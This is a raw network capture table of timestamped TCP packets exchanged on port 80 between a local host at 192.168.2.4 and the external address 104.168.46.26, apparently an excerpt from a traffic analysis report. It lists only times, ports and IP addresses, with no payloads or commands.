                                                                            Nov 26, 2024 09:44:47.399132967 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.399215937 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.401492119 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.401592016 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.401675940 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.404082060 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.404454947 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.404555082 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.406599998 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.406687975 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.406773090 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.410355091 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.410371065 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.410480976 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.411591053 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.411719084 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.411796093 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.414194107 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.414288044 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.414376020 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.416645050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.417112112 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.417167902 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.419379950 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.419397116 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.419437885 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.421668053 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.421799898 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.421967030 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.424217939 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.424299955 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.424344063 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.426804066 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.426837921 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.426902056 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.429306030 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.429411888 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.429475069 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.431818962 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.432152987 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.432209969 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.434773922 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.435044050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.435092926 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.436819077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.436932087 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.436981916 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.439393997 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.439573050 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.439619064 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.441962957 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.441986084 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.442034006 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.444572926 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.444587946 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.444638968 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.447376966 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.447391033 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.447436094 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.449507952 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.449817896 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.449891090 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.452004910 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.452464104 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.452519894 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.454571962 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.455144882 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.455202103 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.527021885 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.527102947 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.527359962 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.527872086 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.528130054 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.528213024 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.530364037 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.530381918 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.530522108 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.531936884 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.532097101 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.532182932 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.533940077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.534300089 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.534436941 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.535684109 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.536237001 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.536317110 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.537589073 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.537812948 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.537894964 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.540679932 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.540699005 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.540802002 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.541309118 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.541665077 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.541755915 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.543379068 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.543477058 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.543551922 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.545114994 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.545404911 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.545480013 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.546732903 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.546772957 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.546885967 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.548532963 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.548671007 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.548748970 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.550297976 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.551295042 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.551372051 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.552376032 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.552380085 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.552495956 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.553755045 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.554414988 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.554485083 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.555568933 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.556144953 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.556258917 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.557265043 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.557610989 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.557749987 CET4973880192.168.2.4104.168.46.26
                                                                            Nov 26, 2024 09:44:47.559271097 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.559289932 CET8049738104.168.46.26192.168.2.4
                                                                            Nov 26, 2024 09:44:47.559382915 CET4973880192.168.2.4104.168.46.26
Nov 26, 2024 09:44:47.560950041 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.562026024 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.562104940 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.563075066 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.563087940 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.563162088 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.564851046 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.564865112 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.564928055 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.565707922 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.566231966 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.566329002 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.567574978 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.567795038 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.567879915 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.568906069 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.569015026 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.569092035 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.570565939 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.570775986 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.570849895 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.572088957 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.572449923 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.572526932 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.573935986 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.574892998 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.574971914 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.575368881 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.575577974 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.575654984 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.577156067 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.577327967 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.577404022 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.577900887 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.578030109 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.578098059 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.578564882 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.579487085 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.579500914 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.579514980 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.579567909 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.579648972 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.580399036 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.580744028 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.580821037 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.581248045 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.581759930 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.581832886 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.582199097 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.582214117 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.582288027 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.583044052 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.583056927 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.583123922 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.583883047 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.584012985 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.584088087 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.584804058 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.585057974 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.585163116 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.585640907 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.586261034 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.586350918 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.586553097 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.586719990 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.586810112 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.587444067 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.587831020 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.587903023 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.588311911 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.588938951 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.589020967 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.589350939 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.589639902 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.589807034 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.590101957 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.590241909 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.590317965 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.591154099 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.591267109 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.591342926 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.591901064 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.592447042 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.592530012 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.592756033 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.593110085 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.593185902 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.593691111 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.593899012 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.593969107 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.594578981 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.594594002 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.594676018 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.595448017 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.595524073 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.595601082 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.596395016 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.596862078 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.597006083 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.597220898 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.597379923 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.597481012 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.598040104 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.652235031 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.728379011 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.728410006 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.728549004 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.728653908 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.728667021 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.728709936 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.729418039 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.729531050 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.729579926 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.730226994 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.730241060 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.730285883 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.731117010 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.731333017 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.731389046 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.732003927 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.732317924 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.732373953 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.732887030 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.733069897 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.733123064 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.733812094 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.734328985 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.734381914 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.734663963 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.735080957 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.735126019 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.735563040 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.735857964 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.735903978 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.736408949 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.736778021 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.736826897 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.737334967 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.737505913 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.737551928 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.738317013 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.738426924 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.738473892 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.739093065 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.739223957 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.739269972 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.739973068 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.740266085 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.740313053 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.740964890 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.741053104 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.741096973 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.741755009 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.741902113 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.741946936 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.742610931 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.743004084 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.743050098 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.743529081 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.743767023 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.743829012 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.744496107 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.744513035 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.744550943 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.745311022 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.745651960 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.745698929 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.746225119 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.746331930 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.746380091 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.747072935 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.747319937 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.747373104 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.747962952 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.748368025 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.748420000 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.748877048 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.748893023 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.748939037 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.749809027 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.750516891 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
Nov 26, 2024 09:44:47.750577927 CET | 49738 | 80 | 192.168.2.4 | 104.168.46.26
Nov 26, 2024 09:44:47.750648022 CET | 80 | 49738 | 104.168.46.26 | 192.168.2.4
